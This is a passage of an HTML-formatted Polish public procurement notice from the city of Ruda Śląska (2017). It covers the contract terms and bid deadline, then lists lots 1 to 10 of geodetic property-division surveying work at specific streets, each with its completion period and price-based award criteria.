                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Istotne dla Zamawiającego postanowienia umowy, zawierają załączone do niniejszej SIWZ wzór umowy (załącznik nr 5).
2. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany kontraktowe) w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami podanymi we wzorze umowy, stanowiących załącznik nr 5 do SIWZ.
3. Zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 144 ust. 1 pkt 2-6 ustawy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/05/2017, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Do oferty należy dołączyć:
1. Oświadczenia zgodne z załącznikiem nr 2 oraz nr 3 do SIWZ (oświadczenia z art. 25a ustawy), które należy złożyć w formie pisemnej albo w postaci elektronicznej.
2. Oświadczenie, że Wykonawca zapoznał się z warunkami zamówienia i z załączonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń - na formularzu oferty  zgodnie z załącznikami nr 1 do SIWZ.
3. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.
4. Spis wszystkich załączonych dokumentów (spis treści)  zalecane, nie wymagane.
5. Wykonawca nie jest obowiązany do złożenia oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub brak podstaw wykluczenia, jeżeli Zamawiający posiada oświadczenia lub dokumenty dotyczące tego Wykonawcy lub może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (tekst jednolity Dz. U. z 2017 r. poz. 570),
6. W przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów, w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobiera samodzielnie z tych baz danych wskazane przez Wykonawcę oświadczenia lub dokumenty,
7. w przypadku wskazania przez Wykonawcę oświadczeń lub dokumentów na potwierdzenie braku podstaw wykluczenia lub spełniania warunków udziału w postępowaniu, w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający żąda od Wykonawcy przedstawienia tłumaczenia na język polski wskazanych przez Wykonawcę i pobranych samodzielnie przez Zamawiającego dokumentów,
8. W przypadku wskazania przez Wykonawcę oświadczeń lub dokumentów, które znajdują się w posiadaniu Zamawiającego, w szczególności oświadczeń lub dokumentów przechowywanych przez Zamawiającego zgodnie z art. 97 ust. 1 ustawy, Zamawiający w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3 ustawy (brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu określonych przez Zamawiającego), korzysta
z posiadanych oświadczeń lub dokumentów, o ile są one aktualne.

</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>1.	Podział nieruchomości położonej w Rudzie Śląskiej - Wirku przy ulicy 1 Maja  Zygmunta Krasińskiego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1Podział nieruchomości położonej w Rudzie Śląskiej - Wirku przy ulicy 1 Maja  Zygmunta Krasińskiego (Postanowienie z dnia 15.02.2017 r. nr AM.6831.2.4.2017.
Prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz z aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska.
Zakres prac nie obejmuje opracowania wstępnego projektu podziału. Zamawiający informuje, iż może zaistnieć konieczność wykonania rozgraniczenia nieruchomości, zmiany powierzchni działki co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonywania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich sporządzenie.
Zamawiający informuje, iż może wystąpić potrzeba zastabilizowania istniejących punktów granicznych w przypadku uszkodzenia, zniszczenia, przesunięcia punktów granicznych.
Zamawiający informuje, iż na Wykonawcy ciąży obowiązek aktualizacji istniejących  kartotek budynkowych ujawnionych w ewidencji gruntów i budynków (wykaz zmian budynkowych). W przypadku braku tych kartotek należy je stworzyć (karta budynkowa). W przypadku zajęcia działek pasem drogowym  zmiana użytków dr na właściwy. W ramach zleconej roboty należy zaktualizować treść mapy w zakresie położenia obiektów budowlanych.
Dopuszcza się wykonanie podziału dla zadania nr 1 zgodnie z § 8 Rozporządzenia Rady Ministrów z dnia 7 grudnia 2004 r. w sprawie sposobu i trybu dokonywania podziałów nieruchomości (Dz. U. z 2004 r. nr 268 poz. 2663).
Obowiązkiem Wykonawcy jest złożenie dokumentów potrzebnych do wydania decyzji do zmiany powierzchni i numeru działki.
Wszelkie koszty związane z wykonaniem zamówienia ponosi Wykonawca. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71353200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 119<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>zadanie należy zrealizować w terminie: I ETAP: podział nieruchomości - 119 dni od daty zawarcia umowy, II ETAP: stabilizacja punktów granicznych wyznaczających nowe granice działki:- 56 dni od dnia zawarcia umowy<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Podział nieruchomości położonej w Rudzie Śląskiej - Wirku przy ulicy Ryszard Magdziorza i Jana Gwiżdża <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Podział nieruchomości położonej w Rudzie Śląskiej - Wirku przy ulicy Ryszarda Magdziorza i Jana Gwiżdża (Postanowienie z dnia 31.01.2017 r. nr AM.6831.2.2.2017.
Przedmiotowe prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz                            z aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska.
Zakres prac nie obejmuje opracowania wstępnego projektu podziału. Zamawiający informuje, iż               może zaistnieć konieczność wykonania rozgraniczenia nieruchomości, zmiany powierzchni działki co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonywania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich sporządzenie.
Zamawiający informuje, iż może wystąpić potrzeba zastabilizowania istniejących punktów granicznych w przypadku uszkodzenia, zniszczenia, przesunięcia punktów granicznych.
Zamawiający jednocześnie informuje, iż na Wykonawcy ciąży obowiązek aktualizacji istniejących  kartotek budynkowych ujawnionych w ewidencji gruntów i budynków (wykaz zmian budynkowych). W przypadku braku tych kartotek należy je stworzyć (karta budynkowa). W przypadku zajęcia działek pasem drogowym  zmiana użytków dr na właściwy. W ramach zleconej roboty należy zaktualizować treść mapy w zakresie położenia obiektów budowlanych.
Informuje się, iż należy ustalić wszystkie granice działki pierwotnej i określić nowe powierzchnie dla wszystkich nowopowstałych działek w zadaniu nr 2.
Obowiązkiem Wykonawcy jest złożenie dokumentów potrzebnych do wydania decyzji do zmiany powierzchni i numeru działki.
Wszelkie koszty związane z wykonaniem zamówienia ponosi Wykonawca. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71353200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 119<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>zamówienie należy wykonać w terminie: I ETAP: podział nieruchomości - 119 dni od daty zawarcia umowy, II ETAP: stabilizacja punktów granicznych wyznaczających nowe granice działki:- 56 dni od dnia zawarcia umowy<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Podział nieruchomości położonej w Rudzie Śląskiej - Wirku przy ulicy Bielszowickiej <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Podział nieruchomości położonej w Rudzie Śląskiej - Wirku przy ulicy Bielszowickiej (Postanowienie z dnia 12.01.2017 r. nr AM.6831.2.56.2016.
Przedmiotowe prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz z aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska.
Zakres prac nie obejmuje opracowania wstępnego projektu podziału. Zamawiający informuje, iż może zaistnieć konieczność wykonania rozgraniczenia nieruchomości, zmiany powierzchni działki co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonywania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich sporządzenie.
Zamawiający informuje, iż może wystąpić potrzeba zastabilizowania istniejących punktów granicznych w przypadku uszkodzenia, zniszczenia, przesunięcia punktów granicznych.
Zamawiający jednocześnie informuje, iż na Wykonawcy ciąży obowiązek aktualizacji istniejących  kartotek budynkowych ujawnionych w ewidencji gruntów i budynków (wykaz zmian budynkowych). W przypadku braku tych kartotek należy je stworzyć (karta budynkowa). W przypadku zajęcia działek pasem drogowym  zmiana użytków dr na właściwy. W ramach zleconej roboty należy zaktualizować treść mapy w zakresie położenia obiektów budowlanych.
Obowiązkiem Wykonawcy jest złożenie dokumentów potrzebnych do wydania decyzji do zmiany powierzchni i numeru działki.
Wszelkie koszty związane z wykonaniem zamówienia ponosi Wykonawca. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71353200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 119<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamówienie należy wykonać w terminie: I ETAP: podział nieruchomości - 119 dni od daty zawarcia umowy, II ETAP: stabilizacja punktów granicznych wyznaczających nowe granice działki:- 56 dni od dnia zawarcia umowy<br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Podział nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Solnej <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Podział nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Solnej (Postanowienie z dnia 09.01.2017 r. nr AM.6831.2.53.2016.
Przedmiotowe prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz z aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska.
Zakres prac nie obejmuje opracowania wstępnego projektu podziału. Zamawiający informuje, iż może zaistnieć konieczność wykonania rozgraniczenia nieruchomości, zmiany powierzchni działki co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonywania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich sporządzenie.
Zamawiający informuje, iż może wystąpić potrzeba zastabilizowania istniejących punktów granicznych w przypadku uszkodzenia, zniszczenia, przesunięcia punktów granicznych.
Zamawiający jednocześnie informuje, iż na Wykonawcy ciąży obowiązek aktualizacji istniejących  kartotek budynkowych ujawnionych w ewidencji gruntów i budynków (wykaz zmian budynkowych). W przypadku braku tych kartotek należy je stworzyć (karta budynkowa). W przypadku zajęcia działek pasem drogowym  zmiana użytków dr na właściwy. W ramach zleconej roboty należy zaktualizować treść mapy w zakresie położenia obiektów budowlanych.
Obowiązkiem Wykonawcy jest złożenie dokumentów potrzebnych do wydania decyzji do zmiany powierzchni i numeru działki.
Wszelkie koszty związane z wykonaniem zamówienia ponosi Wykonawca. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71353200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 119<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamówienie należy wykonać w terminie: I ETAP: podział nieruchomości - 119 dni od daty zawarcia umowy, II ETAP: stabilizacja punktów granicznych wyznaczających nowe granice działki:- 56 dni od dnia zawarcia umowy<br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Podział nieruchomości położonej w Rudzie Śląskiej  Bielszowicach przy ulicy Edmunda Kokota <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Podział nieruchomości położonej w Rudzie Śląskiej  Bielszowicach przy ulicy Edmunda Kokota (Postanowienie z dnia 13.03.2017 r. nr AM.6831.2.7.2017.
Przedmiotowe prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz z aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska.
Zakres prac nie obejmuje opracowania wstępnego projektu podziału. Zamawiający informuje, iż może zaistnieć konieczność wykonania rozgraniczenia nieruchomości, zmiany powierzchni działki co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonywania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich sporządzenie.
Zamawiający informuje, iż może wystąpić potrzeba zastabilizowania istniejących punktów granicznych w przypadku uszkodzenia, zniszczenia, przesunięcia punktów granicznych.
Zamawiający jednocześnie informuje, iż na Wykonawcy ciąży obowiązek aktualizacji istniejących  kartotek budynkowych ujawnionych w ewidencji gruntów i budynków (wykaz zmian budynkowych). W przypadku braku tych kartotek należy je stworzyć (karta budynkowa). W przypadku zajęcia działek pasem drogowym  zmiana użytków dr na właściwy. W ramach zleconej roboty należy zaktualizować treść mapy w zakresie położenia obiektów budowlanych.
Obowiązkiem Wykonawcy jest złożenie dokumentów potrzebnych do wydania decyzji do zmiany powierzchni i numeru działki.
Wszelkie koszty związane z wykonaniem zamówienia ponosi Wykonawca. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71353200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 119<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamówienie należy wykonać w terminie: I ETAP: podział nieruchomości - 119 dni od daty zawarcia umowy, II ETAP: stabilizacja punktów granicznych wyznaczających nowe granice działki:- 56 dni od dnia zawarcia umowy.<br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Podział nieruchomości położonej w Rudzie Śląskiej  Halembie przy Morskiej <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Podział nieruchomości położonej w Rudzie Śląskiej  Halembie przy Morskiej (Postanowienie z dnia 23.03.2017 r. nr AM.6831.2.9.2017.
Przedmiotowe prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz z aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska.
Zakres prac nie obejmuje opracowania wstępnego projektu podziału. Zamawiający informuje, iż może zaistnieć konieczność wykonania rozgraniczenia nieruchomości, zmiany powierzchni działki co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonywania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich sporządzenie.
Zamawiający informuje, iż może wystąpić potrzeba zastabilizowania istniejących punktów granicznych w przypadku uszkodzenia, zniszczenia, przesunięcia punktów granicznych.
Zamawiający jednocześnie informuje, iż na Wykonawcy ciąży obowiązek aktualizacji istniejących  kartotek budynkowych ujawnionych w ewidencji gruntów i budynków (wykaz zmian budynkowych). W przypadku braku tych kartotek należy je stworzyć (karta budynkowa). W przypadku zajęcia działek pasem drogowym  zmiana użytków dr na właściwy. W ramach zleconej roboty należy zaktualizować treść mapy w zakresie położenia obiektów budowlanych.
Obowiązkiem Wykonawcy jest złożenie dokumentów potrzebnych do wydania decyzji do zmiany powierzchni i numeru działki.
Wszelkie koszty związane z wykonaniem zamówienia ponosi Wykonawca. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71353200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 119<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamówienie należy wykonać w terminie: I ETAP: podział nieruchomości - 119 dni od daty zawarcia umowy, II ETAP: stabilizacja punktów granicznych wyznaczających nowe granice działki:- 56 dni od dnia zawarcia umowy.<br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Projekt podziału nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Oświęcimskiej. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>zamówienie obejmuje wykonanie projektu podziału nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Oświęcimskiej.
Przedmiotowe prace należy wykonać zgodnie z obowiązującymi przepisami prawa oraz z aktualnymi wytycznymi Biura Geodety Miasta Ruda Śląska.
Zamówienie obejmuje wykonanie projektu podziału nieruchomości w trybie art. 137 ust 2 w związku z art. 96 ust 1 b ustawy z dnia 21 sierpnia 1998 r. o gospodarce nieruchomościami (tj. Dz. U. z 2016 poz. 2147 z późn.zm.), w celu wydzielenia gruntu. 
Projekt podziału należy sporządzić zgodnie z załączoną mapą, która stanowi załącznik do decyzji Prezydenta Miasta Ruda Śląska nr AGG.74302-13/08 z dnia 25 lipca 2008 r. zatwierdzającej projekt podziału działek nr: 1756/10, 1759/13, 1760/13, 1763/13, obręb Kochłowice, km 6 na działki nr 1902/13, 1903/13. Wydzieleniu podlega powierzchnia stanowiąca część pierwotnej działki nr 1756/10. Granicą północną nowopowstałej działki będzie aktualna granica pomiędzy działkami 1903/13 i 1902/13, natomiast granicami: zachodnią, południową i wschodnią będą przywrócone granice pierwotnej działki 1756/10. 
W ramach zamówienia należy w trybie art. 39 ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (tj. Dz. U. 2016 r. poz. 1629) wznowić znaki graniczne (w przypadku ich uszkodzenia, zniszczenia, przesunięcia) lub wyznaczyć punkty graniczne działek podlegających podziałowi, ujawnione uprzednio w ewidencji gruntów i budynków.
W ramach zamówienia może zaistnieć konieczność wykonania rozgraniczenia nieruchomości lub zmiany powierzchni działki podlegającej wydzieleniu, co Wykonawca powinien przewidzieć przy szacowaniu kosztów wykonania usługi. Zamawiający nie będzie ponosił dodatkowych kosztów za ich wykonanie.
W ramach zamówienia należy sporządzić protokół z czynności przyjęcia granic nieruchomości podlegającej podziałowi oraz utrwalenia na gruncie nowych punktów granicznych. 
Mapę z projektem podziału, wykaz zmian gruntowych i wykaz synchronizacyjny należy wykonać zgodnie z obowiązującymi przepisami prawa i z wytycznymi Biura Geodety Miasta Ruda Śląska.
Mapę z projektem podziału, wykaz zmian gruntowych i wykaz synchronizacyjny należy wykonać w 7 egzemplarzach. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71353200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 105<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamówienie należy zrealizować w terminie do 105 dni od dnia zawarcia umowy.<br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>8.	Projekt podziału nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Opolskiej.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienie jest wykonanie projektu podziału nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ulicy Opolskiej.
Wykonanie projektu podziału nieruchomości w trybie art. 73 ust. 3a ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz.U. Nr 133 poz. 872 zpóźn. zm.), w celu wydzielenia gruntu zajętego pod drogi publiczne, 
w szczególności:
- działka nr 3115/78 o pow. 1819 m2, obręb Kochłowice, k.m. 1, KW Tom 13 karta 440 Kochłowice
Lokalizacja: Ruda Śląska  Kochłowice ul. Opolska.
Cel zamówienia: Przygotowanie wniosków o stwierdzenie nabycia własności nieruchomości przez Miasto Ruda Śląska.     
Ilość egzemplarzy projektu podziału, która ma zostać sporządzona dla każdej nieruchomości (nieruchomość rozumiana jako jedna księga wieczysta): liczba współwłaścicieli nieruchomości + 5 egzemplarzy.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71353200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 98<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamówienie należy zrealizować w terminie do 98 dni od dnia zawarcia umowy.<br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Projekt podziału nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ul. Gajowej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wykonanie projektu podziału nieruchomości położonej w Rudzie Śląskiej - Kochłowicach przy ul. Gajowej.
Projekt podziału ul.  Gajowa obejmuje:
- działkę nr 72 o pow. 560 m2, obręb Kochłowice, k.m. 6, KW GL1S/00004116/2,
- działkę nr 1353/73 o pow. 207 m2, obręb Kochłowice, k.m. 6, KW GL1S/00006437/2,
- działkę nr 268/73 o pow. 190 m2, obręb Kochłowice, k.m. 6, KW GL1S/00003813/1
Cel zamówienia: Przygotowanie wniosków o stwierdzenie nabycia własności nieruchomości przez Miasto Ruda Śląska. 
Ilość egzemplarzy projektu podziału, która ma zostać sporządzona dla każdej nieruchomości. 
(nieruchomość rozumiana jako jedna księga wieczysta): liczba współwłaścicieli nieruchomości + 5 
egzemplarzy;
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71353200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 112<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamówienie należy wykonać w terminie do 112 dni od dnia zawarcia umowy.<br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>Projekt podziału nieuchomości połozonej w Rudzie Śląskiej - Bielszowicach przy ul. Szkolnej i Mokrej<br /><div style="padding-left: 20px"><b>
